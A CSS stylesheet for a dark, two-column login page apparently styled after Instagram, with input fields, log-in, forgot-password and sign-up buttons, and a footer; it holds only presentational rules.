body{
    margin:0px;
}
#container{
    display: flex;
}
#left{
    width: 65%;
    border-right: 1px solid rgb(61, 79, 92);
    border-bottom: 1px solid rgb(61, 79, 92);
    border-left: none;
    border-top:none;
    background-color: rgb(12, 16, 20);
}
#right{
    width:35%;
    border-right: none;
    border-bottom: 1px solid rgb(61, 79, 92);
    border-left: 1px solid rgb(61, 79, 92);
    border-top:none;
    background-color: rgb(21, 33, 39);
    
}




#infoDiv{
    align-items: center;
    text-align: center;
    margin-top: 80px;
}
#infoDiv p{
    font-size:55px;
    color:white;
    margin:0px;
    font-family:"Instagram Sans Regular";
}
#textInfoDiv{
    font-size:30px;
}
#pictureInfoDiv{
    margin-top:35px;
}
#gradientText{
    background: linear-gradient(45deg, rgb(255, 88, 5), rgb(213, 0, 193));
    -webkit-background-clip: text;
    -webkit-text-fill-color: transparent;
}


#formDiv{
    margin-top:30%;
    padding-left:50px;
    padding-right:50px;
    text-align: center;
}
#LogInForm {
  display: flex;
  flex-direction: column;
}
#LogInForm p{
    margin:0px;
    color:white;
    font-family: "Segoe UI Historic";
}
.inputForm{
    width:100%;
    background-color: rgb(21, 33, 39);
    box-sizing: border-box;
    border:none;
    color:rgb(150, 166, 180);
    font-size: 17px;
}
.inputForm:focus{
    border: none;
    outline: none;
}
.inputForm::placeholder{
    color:rgb(150, 166, 180);
    font-size: 17px;
}
.inputDiv{
    border-radius: 15px;
    border:1px solid rgb(61, 79, 92);
    background-color: rgb(21, 33, 39);
    padding:18px;
}
.inputDiv:hover{
    border-color:rgb(150, 166, 180);
}
#logInBtn{
    background-color: rgb(0, 100, 224);
    border:1px solid rgb(0, 100, 224);
    border-radius: 20px;
    height: 45px;
    color:white;
    font-size: 16px;
    margin-top:23px;
}
#logInBtn:hover{
    background-color: rgb(0, 115, 255);
}
#forgotBtn{
    border:1px solid rgb(21, 33, 39);
    border-radius: 20px;
    height: 45px;
    color:white;
    font-size: 16px;
    margin-top:10px;
    background-color: rgb(21, 33, 39);
}
#forgotBtn:hover{
    background-color: rgb(45, 56, 61);
}
#faceSignBtn{
    border:1px solid rgb(61, 79, 92);
    border-radius: 20px;
    background-color:rgb(21, 33, 39) ;
    height: 45px;
    color:white;
    margin-top:50px;
    
}
#сrtBtn{
    border:1px solid rgb(69, 153, 255);
    border-radius: 20px;
    background-color:rgb(21, 33, 39) ;
    height: 45px;
    color:rgb(74, 169, 254);
    margin-top:10px;
}
#faceSignBtn:hover{
    background-color: rgb(45, 56, 61);
}
#сrtBtn:hover{
    background-color: rgb(45, 56, 61);
}
#metaIconText{
    display:flex;
    align-items: center;
    justify-content: center;
    padding-top:15px;
}





footer{
    margin:0px;
    text-align: center;
    font-size: 13px;
    background-color: rgb(12, 16, 20);
    width: 100%;
    padding-top:25px;
    padding-bottom:60px;
}
footer a{
    text-decoration: none;
    color: rgb(172, 171, 171);
    margin-left:15px;
}
footer p{
    margin:0px;
    font-size:12px;
    font-family:"BlinkMacSystemFont";
}
footer a:hover{
    text-decoration: underline;
}
#copyrightP{
    margin-top:20px;
    color:rgb(172, 171, 171);
}



#instIcon {
  position: fixed;
  top: 50px;
  left: 50px;
  pointer-events: none;
}